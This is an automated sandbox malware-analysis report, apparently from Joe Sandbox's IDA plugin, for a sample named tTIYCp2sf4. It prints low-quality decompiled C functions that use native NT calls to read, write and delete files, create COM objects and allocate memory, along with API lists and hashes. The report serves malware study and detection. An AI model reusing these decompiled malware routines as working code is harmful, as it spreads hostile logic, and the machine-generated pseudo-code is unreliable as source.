                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                  • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                  • API String ID: 421316089-2206134580
                                                                                                  • Opcode ID: ad57cdd740a7ba4f7724b0cf72f97f6ec1485e95c69d61abca2e5fb5c209410f
                                                                                                  • Instruction ID: eb5eb95693bff6950d2207977a28030dc875875264b33dc90d1c4317be0742b9
                                                                                                  • Opcode Fuzzy Hash: ad57cdd740a7ba4f7724b0cf72f97f6ec1485e95c69d61abca2e5fb5c209410f
                                                                                                  • Instruction Fuzzy Hash: 64E0E5BE540218ABEB00DE98DC49EEB77ECEB08611F044401BA15C7201DA74EA208BF1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%


                                                                                                  C-Code - Quality: 31%
                                                                                                  			E0286BDD8(char __eax, void* __ebx, void* __edx, void* __esi) {
                                                                                                  				char _v8;
                                                                                                  				void* _v12;
                                                                                                  				char _v20;
                                                                                                  				void* _v28;
                                                                                                  				void* _v52;
                                                                                                  				intOrPtr _v68;
                                                                                                  				void _v76;
                                                                                                  				void* _t49;
                                                                                                  				intOrPtr _t56;
                                                                                                  				intOrPtr _t58;
                                                                                                  				void* _t61;
                                                                                                  
                                                                                                  				_t49 = __edx;
                                                                                                  				_v8 = __eax;
                                                                                                  				E02854EE4( &_v8);
                                                                                                  				_push(_t61);
                                                                                                  				_push(0x286bea8);
                                                                                                  				_push( *[fs:eax]);
                                                                                                  				 *[fs:eax] = _t61 + 0xffffffb8;
                                                                                                  				E028544A0(_t49);
                                                                                                  				_push(0);
                                                                                                  				_push(0);
                                                                                                  				_push( &_v20);
                                                                                                  				_push(E02854DB4(_v8));
                                                                                                  				L0286BC34();
                                                                                                  				E0286BC3C( &_v52, 0x40,  &_v20, 0, 0, 0);
                                                                                                  				NtOpenFile( &_v12, 0x100001,  &_v52,  &_v28, 1, 0x20); // executed
                                                                                                  				NtQueryInformationFile(_v12,  &_v28,  &_v76, 0x18, 5);
                                                                                                  				_t58 = _v68;
                                                                                                  				E02854B90(_t49, _t58);
                                                                                                  				_push(0);
                                                                                                  				_push(0);
                                                                                                  				_push(_t58);
                                                                                                  				_push(E028549BC(_t49));
                                                                                                  				_push( &_v28);
                                                                                                  				_push(0);
                                                                                                  				_push(0);
                                                                                                  				_push(0);
                                                                                                  				_push(_v12); // executed
                                                                                                  				L02867CE0(); // executed
                                                                                                  				NtClose(_v12);
                                                                                                  				_pop(_t56);
                                                                                                  				 *[fs:eax] = _t56;
                                                                                                  				_push(0x286beaf);
                                                                                                  				return E02854C24( &_v8);
                                                                                                  			}















                                                                                                  APIs
                                                                                                    • Part of subcall function 02854EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02854EF2
                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0286BEA8), ref: 0286BE13
                                                                                                  • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0286BEA8), ref: 0286BE43
                                                                                                  • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0286BE58
                                                                                                  • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0286BE84
                                                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0286BE8D
                                                                                                    • Part of subcall function 02854C24: SysFreeString.OLEAUT32(0286C78C), ref: 02854C32
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 1897104825-0
                                                                                                  • Opcode ID: 0050bc499556f4d4d70b6bcaff688c3091e814c8f616e31c2ff7da1e7ce52512
                                                                                                  • Instruction ID: 6c22ad57228bb64483febb8a3fbc50878e732412e408bf61577ad7e1cf273b64
                                                                                                  • Opcode Fuzzy Hash: 0050bc499556f4d4d70b6bcaff688c3091e814c8f616e31c2ff7da1e7ce52512
                                                                                                  • Instruction Fuzzy Hash: 8F21D37DA503187AEB11EAD8CC46FEFB7BDEB08704F500461B600F71C0DAB4AA459B95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%


                                                                                                  C-Code - Quality: 33%
                                                                                                  			E0286BCF4(char __eax, void* __ebx, char __edx, void* __esi) {
                                                                                                  				char _v8;
                                                                                                  				char _v12;
                                                                                                  				void* _v16;
                                                                                                  				char _v24;
                                                                                                  				void* _v32;
                                                                                                  				void* _v56;
                                                                                                  				intOrPtr _t52;
                                                                                                  				char _t54;
                                                                                                  				void* _t58;
                                                                                                  
                                                                                                  				_v12 = __edx;
                                                                                                  				_v8 = __eax;
                                                                                                  				E02854954(_v8);
                                                                                                  				E02854EE4( &_v12);
                                                                                                  				_push(_t58);
                                                                                                  				_push(0x286bdc6);
                                                                                                  				_push( *[fs:eax]);
                                                                                                  				 *[fs:eax] = _t58 + 0xffffffcc;
                                                                                                  				_push(0);
                                                                                                  				_push(0);
                                                                                                  				_push( &_v24);
                                                                                                  				_push(E02854DB4(_v12));
                                                                                                  				L0286BC34();
                                                                                                  				E0286BC3C( &_v56, 0x40,  &_v24, 0, 0, 0);
                                                                                                  				NtCreateFile( &_v16, 0x100002,  &_v56,  &_v32, 0, 0, 1, 2, 0x20, 0, 0); // executed
                                                                                                  				_t54 = _v8;
                                                                                                  				if(_t54 != 0) {
                                                                                                  					_t54 =  *((intOrPtr*)(_t54 - 4));
                                                                                                  				}
                                                                                                  				_push(0);
                                                                                                  				_push(0);
                                                                                                  				_push(_t54);
                                                                                                  				_push(E028549BC( &_v8));
                                                                                                  				_push( &_v32);
                                                                                                  				_push(0);
                                                                                                  				_push(0);
                                                                                                  				_push(0);
                                                                                                  				_push(_v16); // executed
                                                                                                  				L02867CE8(); // executed
                                                                                                  				NtClose(_v16);
                                                                                                  				_pop(_t52);
                                                                                                  				 *[fs:eax] = _t52;
                                                                                                  				_push(0x286bdcd);
                                                                                                  				E02854C24( &_v12);
                                                                                                  				return E028544A0( &_v8);
                                                                                                  			}













                                                                                                  APIs
                                                                                                    • Part of subcall function 02854EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02854EF2
                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0286BDC6), ref: 0286BD33
                                                                                                  • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0286BD6D
                                                                                                  • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0286BD9A
                                                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0286BDA3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3764614163-0
                                                                                                  • Opcode ID: 8e9111f731d135f3620cb3dbe0a0e431263f7b0de402e49475929c4f8023180c
                                                                                                  • Instruction ID: d137ff3563a6625d029ed558dbb21e48d94cd9f4ab44d6b49a3d3e33f408873d
                                                                                                  • Opcode Fuzzy Hash: 8e9111f731d135f3620cb3dbe0a0e431263f7b0de402e49475929c4f8023180c
                                                                                                  • Instruction Fuzzy Hash: 5021C079A40218BAFB10EA94CD46FEEB7BDEF04B04F504461B600FB1D0D7B46E449B55
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  C-Code - Quality: 37%
                                                                                                  			E0286BC64(short __eax, void* __ebx) {
                                                                                                  				short _v8;
                                                                                                  				void* _v16;
                                                                                                  				void* _v40;
                                                                                                  				intOrPtr _t33;
                                                                                                  				void* _t36;
                                                                                                  
                                                                                                  				_v8 = __eax;
                                                                                                  				E02854EE4( &_v8);
                                                                                                  				_push(_t36);
                                                                                                  				_push(0x286bcde);
                                                                                                  				_push( *[fs:eax]);
                                                                                                  				 *[fs:eax] = _t36 + 0xffffffdc;
                                                                                                  				RtlInitUnicodeString( &_v16,  &_v8);
                                                                                                  				_push(0);
                                                                                                  				_push(0);
                                                                                                  				_push( &_v16);
                                                                                                  				_push(E02854DB4(_v8));
                                                                                                  				L0286BC34();
                                                                                                  				E0286BC3C( &_v40, 0x40,  &_v16, 0, 0, 0);
                                                                                                  				NtDeleteFile( &_v40); // executed
                                                                                                  				_pop(_t33);
                                                                                                  				 *[fs:eax] = _t33;
                                                                                                  				_push(0x286bce5);
                                                                                                  				return E02854C24( &_v8);
                                                                                                  			}









                                                                                                  APIs
                                                                                                    • Part of subcall function 02854EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02854EF2
                                                                                                  • RtlInitUnicodeString.N(?,?,00000000,0286BCDE), ref: 0286BC8C
                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0286BCDE), ref: 0286BCA2
                                                                                                  • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0286BCDE), ref: 0286BCC1
                                                                                                    • Part of subcall function 02854C24: SysFreeString.OLEAUT32(0286C78C), ref: 02854C32
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 1694942484-0
                                                                                                  • Opcode ID: 44701f124d2c6e4387c5fb416bea0525b49ef4e2a917b27eb914fd02aa7ce9c8
                                                                                                  • Instruction ID: 853b932f2603d542797e708f383587d445fc87a361d214efbbe32fc5a829df46
                                                                                                  • Opcode Fuzzy Hash: 44701f124d2c6e4387c5fb416bea0525b49ef4e2a917b27eb914fd02aa7ce9c8
                                                                                                  • Instruction Fuzzy Hash: 9F01F47D90420CBAEB11EBE4DD46FDEB3FEEB48708F504461A601F2580EF74AB059A65
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 37%
                                                                                                  			E02866DC0(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                  				intOrPtr _v8;
                                                                                                  				char _v24;
                                                                                                  				char _v28;
                                                                                                  				intOrPtr _t29;
                                                                                                  				intOrPtr _t30;
                                                                                                  				void* _t34;
                                                                                                  				void* _t35;
                                                                                                  				intOrPtr _t36;
                                                                                                  
                                                                                                  				_t34 = _t35;
                                                                                                  				_t36 = _t35 + 0xffffffd8;
                                                                                                  				_push(__esi);
                                                                                                  				_v28 = 0;
                                                                                                  				_v8 = __eax;
                                                                                                  				_push(_t34);
                                                                                                  				_push(0x2866e93);
                                                                                                  				_push( *[fs:eax]);
                                                                                                  				 *[fs:eax] = _t36;
                                                                                                  				_push(_t34);
                                                                                                  				_push(0x2866e23);
                                                                                                  				_push( *[fs:eax]);
                                                                                                  				 *[fs:eax] = _t36;
                                                                                                  				E02866D64(_v8, __edx, 0,  &_v24, __esi, __eflags); // executed
                                                                                                  				_push(E02855E70(__edx));
                                                                                                  				_push(0x2866ea4);
                                                                                                  				_push(5);
                                                                                                  				_push( &_v24); // executed
                                                                                                  				L0285CDA4(); // executed
                                                                                                  				E02866D54( &_v24);
                                                                                                  				_pop(_t29);
                                                                                                  				 *[fs:eax] = _t29;
                                                                                                  				_t30 = 0;
                                                                                                  				 *[fs:eax] = _t30;
                                                                                                  				_push(0x2866e9a);
                                                                                                  				return E028544A0( &_v28);
                                                                                                  			}












                                                                                                  APIs
                                                                                                    • Part of subcall function 02866D64: CLSIDFromProgID.OLE32(00000000,?,00000000,02866DB1,?,?,?,00000000), ref: 02866D91
                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,02866EA4,00000000,00000000,02866E23,?,00000000,02866E93), ref: 02866E0F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFromInstanceProg
                                                                                                  • String ID:
                                                                                                  • API String ID: 2151042543-0
                                                                                                  • Opcode ID: 2b78cea042515522fc3979d801260cb6239fe1107b78492e5e3db708f5128ab7
                                                                                                  • Instruction ID: ddad01514dc44523ee4aac73124240eff0f0313df9f4771cea726070d12493f7
                                                                                                  • Opcode Fuzzy Hash: 2b78cea042515522fc3979d801260cb6239fe1107b78492e5e3db708f5128ab7
                                                                                                  • Instruction Fuzzy Hash: 6A01423C208784AFE701DFA8DC5687FBBADEB48B10FA14475F800D2A40F638AD00C862
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 43%
                                                                                                  			E0286C930(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                                                                  				char _v8;
                                                                                                  				intOrPtr _v12;
                                                                                                  				char _v16;
                                                                                                  				char _v20;
                                                                                                  				char _v24;
                                                                                                  				intOrPtr _v28;
                                                                                                  				char _v32;
                                                                                                  				char _v36;
                                                                                                  				char _v40;
                                                                                                  				intOrPtr _v44;
                                                                                                  				char _v48;
                                                                                                  				char _v52;
                                                                                                  				char _v56;
                                                                                                  				intOrPtr _v60;
                                                                                                  				char _v64;
                                                                                                  				char _v68;
                                                                                                  				char _v72;
                                                                                                  				intOrPtr _v76;
                                                                                                  				char _v80;
                                                                                                  				char _v84;
                                                                                                  				char _v88;
                                                                                                  				intOrPtr _v92;
                                                                                                  				char _v96;
                                                                                                  				char _v100;
                                                                                                  				char _v104;
                                                                                                  				intOrPtr _v108;
                                                                                                  				char _v112;
                                                                                                  				char _v116;
                                                                                                  				char _v120;
                                                                                                  				intOrPtr _v124;
                                                                                                  				char _v128;
                                                                                                  				char _v132;
                                                                                                  				char _v136;
                                                                                                  				char _v140;
                                                                                                  				intOrPtr _v144;
                                                                                                  				char _v148;
                                                                                                  				char _v152;
                                                                                                  				char _v156;
                                                                                                  				intOrPtr _v160;
                                                                                                  				char _v164;
                                                                                                  				char _v168;
                                                                                                  				char _v172;
                                                                                                  				char _v176;
                                                                                                  				intOrPtr _v180;
                                                                                                  				char _v184;
                                                                                                  				char _v188;
                                                                                                  				char _v192;
                                                                                                  				intOrPtr _v196;
                                                                                                  				char _v200;
                                                                                                  				char _v204;
                                                                                                  				char _v208;
                                                                                                  				intOrPtr _v212;
                                                                                                  				char _v216;
                                                                                                  				char _v220;
                                                                                                  				char _v224;
                                                                                                  				intOrPtr _v228;
                                                                                                  				char _v232;
                                                                                                  				char _v236;
                                                                                                  				char _v240;
                                                                                                  				intOrPtr _v244;
                                                                                                  				char _v248;
                                                                                                  				char _v252;
                                                                                                  				char _v256;
                                                                                                  				intOrPtr _v260;
                                                                                                  				char _v264;
                                                                                                  				char _v268;
                                                                                                  				char _v272;
                                                                                                  				intOrPtr _v276;
                                                                                                  				char _v280;
                                                                                                  				char _v284;
                                                                                                  				char _v288;
                                                                                                  				char _v292;
                                                                                                  				intOrPtr _v296;
                                                                                                  				char _v300;
                                                                                                  				char _v304;
                                                                                                  				char _v308;
                                                                                                  				intOrPtr _v312;
                                                                                                  				char _v316;
                                                                                                  				char _v320;
                                                                                                  				char _v324;
                                                                                                  				intOrPtr _v328;
                                                                                                  				char _v332;
                                                                                                  				char _v336;
                                                                                                  				char _v340;
                                                                                                  				intOrPtr _v344;
                                                                                                  				char _v348;
                                                                                                  				char _v352;
                                                                                                  				char _v356;
                                                                                                  				intOrPtr _v360;
                                                                                                  				char _v364;
                                                                                                  				char _v368;
                                                                                                  				char _v372;
                                                                                                  				intOrPtr _v376;
                                                                                                  				char _v380;
                                                                                                  				char _v384;
                                                                                                  				char _v388;
                                                                                                  				intOrPtr _v392;
                                                                                                  				char _v396;
                                                                                                  				char _v400;
                                                                                                  				char _v404;
                                                                                                  				intOrPtr _v408;
                                                                                                  				char _v412;
                                                                                                  				char _v416;
                                                                                                  				char _v420;
                                                                                                  				intOrPtr _v424;
                                                                                                  				char _v428;
                                                                                                  				char _v432;
                                                                                                  				char _v436;
                                                                                                  				intOrPtr _v440;
                                                                                                  				char _v444;
                                                                                                  				char _v448;
                                                                                                  				char _v452;
                                                                                                  				intOrPtr _v456;
                                                                                                  				char _v460;
                                                                                                  				char _v464;
                                                                                                  				char _v468;
                                                                                                  				intOrPtr _v472;
                                                                                                  				char _v476;
                                                                                                  				char _v480;
                                                                                                  				char _v484;
                                                                                                  				intOrPtr _v488;
                                                                                                  				char _v492;
                                                                                                  				char _v496;
                                                                                                  				char _v500;
                                                                                                  				intOrPtr _v504;
                                                                                                  				char _v508;
                                                                                                  				char _v512;
                                                                                                  				char _v516;
                                                                                                  				intOrPtr _v520;
                                                                                                  				char _v524;
                                                                                                  				char _v528;
                                                                                                  				char _v532;
                                                                                                  				intOrPtr _v536;
                                                                                                  				char _v540;
                                                                                                  				char _v544;
                                                                                                  				char _v548;
                                                                                                  				char _v552;
                                                                                                  				char _v556;
                                                                                                  				intOrPtr _v560;
                                                                                                  				char _v564;
                                                                                                  				char _v568;
                                                                                                  				char _v572;
                                                                                                  				intOrPtr _v576;
                                                                                                  				char _v580;
                                                                                                  				char _v584;
                                                                                                  				char _v588;
                                                                                                  				char _v592;
                                                                                                  				intOrPtr _v596;
                                                                                                  				char _v600;
                                                                                                  				char _v604;
                                                                                                  				char _v608;
                                                                                                  				intOrPtr _v612;
                                                                                                  				char _v616;
                                                                                                  				char _v620;
                                                                                                  				char _v624;
                                                                                                  				intOrPtr _v628;
                                                                                                  				char _v632;
                                                                                                  				char _v636;
                                                                                                  				char _v640;
                                                                                                  				intOrPtr _v644;
                                                                                                  				char _v648;
                                                                                                  				char _v652;
                                                                                                  				char _v656;
                                                                                                  				intOrPtr _v660;
                                                                                                  				char _v664;
                                                                                                  				char _v668;
                                                                                                  				char _v672;
                                                                                                  				intOrPtr _v676;
                                                                                                  				char _v680;
                                                                                                  				char _v684;
                                                                                                  				char _v688;
                                                                                                  				intOrPtr _v692;
                                                                                                  				char _v696;
                                                                                                  				char _v700;
                                                                                                  				char _v704;
                                                                                                  				char _v708;
                                                                                                  				intOrPtr _v712;
                                                                                                  				char _v716;
                                                                                                  				char _v720;
                                                                                                  				char _v724;
                                                                                                  				intOrPtr _v728;
                                                                                                  				char _v732;
                                                                                                  				char _v736;
                                                                                                  				char _v740;
                                                                                                  				intOrPtr _v744;
                                                                                                  				char _v748;
                                                                                                  				char _v752;
                                                                                                  				char _v756;
                                                                                                  				intOrPtr _v760;
                                                                                                  				char _v764;
                                                                                                  				char _v768;
                                                                                                  				char _v772;
                                                                                                  				intOrPtr _v776;
                                                                                                  				char _v780;
                                                                                                  				char _v784;
                                                                                                  				char _v788;
                                                                                                  				intOrPtr _v792;
                                                                                                  				char _v796;
                                                                                                  				char _v800;
                                                                                                  				char _v804;
                                                                                                  				intOrPtr _v808;
                                                                                                  				char _v812;
                                                                                                  				char _v816;
                                                                                                  				char _v820;
                                                                                                  				intOrPtr _v824;
                                                                                                  				char _v828;
                                                                                                  				char _v832;
                                                                                                  				char _v836;
                                                                                                  				intOrPtr _v840;
                                                                                                  				char _v844;
                                                                                                  				char _v848;
                                                                                                  				char _v852;
                                                                                                  				intOrPtr _v856;
                                                                                                  				char _v860;
                                                                                                  				char _v864;
                                                                                                  				char _v868;
                                                                                                  				char _v872;
                                                                                                  				intOrPtr _v876;
                                                                                                  				char _v880;
                                                                                                  				char _v884;
                                                                                                  				char _v888;
                                                                                                  				intOrPtr _v892;
                                                                                                  				char _v896;
                                                                                                  				char _v900;
                                                                                                  				char _v904;
                                                                                                  				intOrPtr _v908;
                                                                                                  				char _v912;
                                                                                                  				char _v916;
                                                                                                  				char _v920;
                                                                                                  				intOrPtr _v924;
                                                                                                  				char _v928;
                                                                                                  				char _v932;
                                                                                                  				char _v936;
                                                                                                  				intOrPtr _v940;
                                                                                                  				char _v944;
                                                                                                  				char _v948;
                                                                                                  				char _v952;
                                                                                                  				intOrPtr _v956;
                                                                                                  				char _v960;
                                                                                                  				char _v964;
                                                                                                  				char _v980;
                                                                                                  				char _v984;
                                                                                                  				intOrPtr _v988;
                                                                                                  				char _v992;
                                                                                                  				char _v996;
                                                                                                  				char _v1000;
                                                                                                  				intOrPtr _v1004;
                                                                                                  				char _v1008;
                                                                                                  				char _v1012;
                                                                                                  				intOrPtr* _v1016;
                                                                                                  				char _v1020;
                                                                                                  				intOrPtr _v1024;
                                                                                                  				char _v1028;
                                                                                                  				char _v1032;
                                                                                                  				char _v1036;
                                                                                                  				intOrPtr _v1040;
                                                                                                  				char _v1044;
                                                                                                  				char _v1048;
                                                                                                  				char _v1052;
                                                                                                  				char _v1056;
                                                                                                  				intOrPtr _v1060;
                                                                                                  				char _v1064;
                                                                                                  				char _v1068;
                                                                                                  				char _v1072;
                                                                                                  				intOrPtr _v1076;
                                                                                                  				char _v1080;
                                                                                                  				char _v1084;
                                                                                                  				char _v1088;
                                                                                                  				intOrPtr _v1092;
                                                                                                  				char _v1096;
                                                                                                  				char _v1100;
                                                                                                  				char _v1104;
                                                                                                  				intOrPtr _v1108;
                                                                                                  				char _v1112;
                                                                                                  				char _v1116;
                                                                                                  				char _v1120;
                                                                                                  				intOrPtr _v1124;
                                                                                                  				char _v1128;
                                                                                                  				char _v1132;
                                                                                                  				char _v1136;
                                                                                                  				intOrPtr _v1140;
                                                                                                  				char _v1144;
                                                                                                  				char _v1148;
                                                                                                  				char _v1152;
                                                                                                  				intOrPtr _v1156;
                                                                                                  				char _v1160;
                                                                                                  				char _v1164;
                                                                                                  				char _v1168;
                                                                                                  				intOrPtr _v1172;
                                                                                                  				char _v1176;
                                                                                                  				char _v1180;
                                                                                                  				char _v1184;
                                                                                                  				char _v1188;
                                                                                                  				intOrPtr _v1192;
                                                                                                  				char _v1196;
                                                                                                  				char _v1200;
                                                                                                  				char _v1204;
                                                                                                  				intOrPtr _v1208;
                                                                                                  				char _v1212;
                                                                                                  				char _v1216;
                                                                                                  				char _v1220;
                                                                                                  				intOrPtr _v1224;
                                                                                                  				char _v1228;
                                                                                                  				char _v1232;
                                                                                                  				char _v1236;
                                                                                                  				intOrPtr _v1240;
                                                                                                  				char _v1244;
                                                                                                  				char _v1248;
                                                                                                  				char _v1252;
                                                                                                  				char _v1256;
                                                                                                  				intOrPtr _v1260;
                                                                                                  				char _v1264;
                                                                                                  				char _v1268;
                                                                                                  				char _v1272;
                                                                                                  				intOrPtr _v1276;
                                                                                                  				char _v1280;
                                                                                                  				char _v1284;
                                                                                                  				char _v1288;
                                                                                                  				intOrPtr _v1292;
                                                                                                  				char _v1296;
                                                                                                  				char _v1300;
                                                                                                  				char _v1304;
                                                                                                  				intOrPtr _v1308;
                                                                                                  				char _v1312;
                                                                                                  				char _v1316;
                                                                                                  				char _v1320;
                                                                                                  				char _v1324;
                                                                                                  				char _v1328;
                                                                                                  				intOrPtr _v1332;
                                                                                                  				char _v1336;
                                                                                                  				char _v1340;
                                                                                                  				char _v1344;
                                                                                                  				intOrPtr _v1348;
                                                                                                  				char _v1352;
                                                                                                  				char _v1356;
                                                                                                  				char _v1360;
                                                                                                  				intOrPtr _v1364;
                                                                                                  				char _v1368;
                                                                                                  				char _v1372;
                                                                                                  				char _v1376;
                                                                                                  				intOrPtr _v1380;
                                                                                                  				char _v1384;
                                                                                                  				char _v1388;
                                                                                                  				char _v1392;
                                                                                                  				intOrPtr _v1396;
                                                                                                  				char _v1400;
                                                                                                  				char _v1404;
                                                                                                  				char _v1408;
                                                                                                  				intOrPtr _v1412;
                                                                                                  				char _v1416;
                                                                                                  				char _v1420;
                                                                                                  				char _v1424;
                                                                                                  				char _v1428;
                                                                                                  				intOrPtr _v1432;
                                                                                                  				char _v1436;
                                                                                                  				char _v1440;
                                                                                                  				char _v1444;
                                                                                                  				intOrPtr _v1448;
                                                                                                  				char _v1452;
                                                                                                  				char _v1456;
                                                                                                  				char _v1460;
                                                                                                  				char _v1464;
                                                                                                  				intOrPtr _v1468;
                                                                                                  				char _v1472;
                                                                                                  				char _v1476;
                                                                                                  				char _v1480;
                                                                                                  				intOrPtr _v1484;
                                                                                                  				char _v1488;
                                                                                                  				char _v1492;
                                                                                                  				char _v1496;
                                                                                                  				intOrPtr _v1500;
                                                                                                  				char _v1504;
                                                                                                  				char _v1508;
                                                                                                  				char _v1512;
                                                                                                  				intOrPtr _v1516;
                                                                                                  				char _v1520;
                                                                                                  				char _v1524;
                                                                                                  				char _v1528;
                                                                                                  				intOrPtr _v1532;
                                                                                                  				char _v1536;
                                                                                                  				char _v1540;
                                                                                                  				char _v1544;
                                                                                                  				intOrPtr _v1548;
                                                                                                  				char _v1552;
                                                                                                  				char _v1556;
                                                                                                  				char _v1560;
                                                                                                  				intOrPtr _v1564;
                                                                                                  				char _v1568;
                                                                                                  				intOrPtr _v1572;
                                                                                                  				char _v1576;
                                                                                                  				char _v1580;
                                                                                                  				char _v1584;
                                                                                                  				intOrPtr _v1588;
                                                                                                  				char _v1592;
                                                                                                  				char _v1596;
                                                                                                  				char _v1600;
                                                                                                  				intOrPtr _v1604;
                                                                                                  				char _v1608;
                                                                                                  				char _v1612;
                                                                                                  				intOrPtr _v1616;
                                                                                                  				char _v1620;
                                                                                                  				intOrPtr _v1624;
                                                                                                  				char _v1628;
                                                                                                  				char _v1632;
                                                                                                  				char _v1636;
                                                                                                  				intOrPtr _v1640;
                                                                                                  				char _v1644;
                                                                                                  				char _v1648;
                                                                                                  				char _v1652;
                                                                                                  				intOrPtr _v1656;
                                                                                                  				char _v1660;
                                                                                                  				char _v1664;
                                                                                                  				char _v1668;
                                                                                                  				intOrPtr _v1672;
                                                                                                  				char _v1676;
                                                                                                  				char _v1680;
                                                                                                  				char _v1684;
                                                                                                  				intOrPtr _v1688;
                                                                                                  				char _v1692;
                                                                                                  				char _v1696;
                                                                                                  				intOrPtr _v1700;
                                                                                                  				char _v1704;
                                                                                                  				intOrPtr _v1708;
                                                                                                  				char _v1712;
                                                                                                  				char _v1716;
                                                                                                  				char _v1720;
                                                                                                  				intOrPtr _v1724;
                                                                                                  				char _v1728;
                                                                                                  				char _v1732;
                                                                                                  				char _v1736;
                                                                                                  				intOrPtr _v1740;
                                                                                                  				char _v1744;
                                                                                                  				char _v1748;
                                                                                                  				char _v1752;
                                                                                                  				intOrPtr _v1756;
                                                                                                  				char _v1760;
                                                                                                  				char _v1764;
                                                                                                  				char _v1768;
                                                                                                  				intOrPtr _v1772;
                                                                                                  				char _v1776;
                                                                                                  				char _v1780;
                                                                                                  				char _v1784;
                                                                                                  				char _v1788;
                                                                                                  				char _v1792;
                                                                                                  				char _v1796;
                                                                                                  				intOrPtr _v1800;
                                                                                                  				char _v1804;
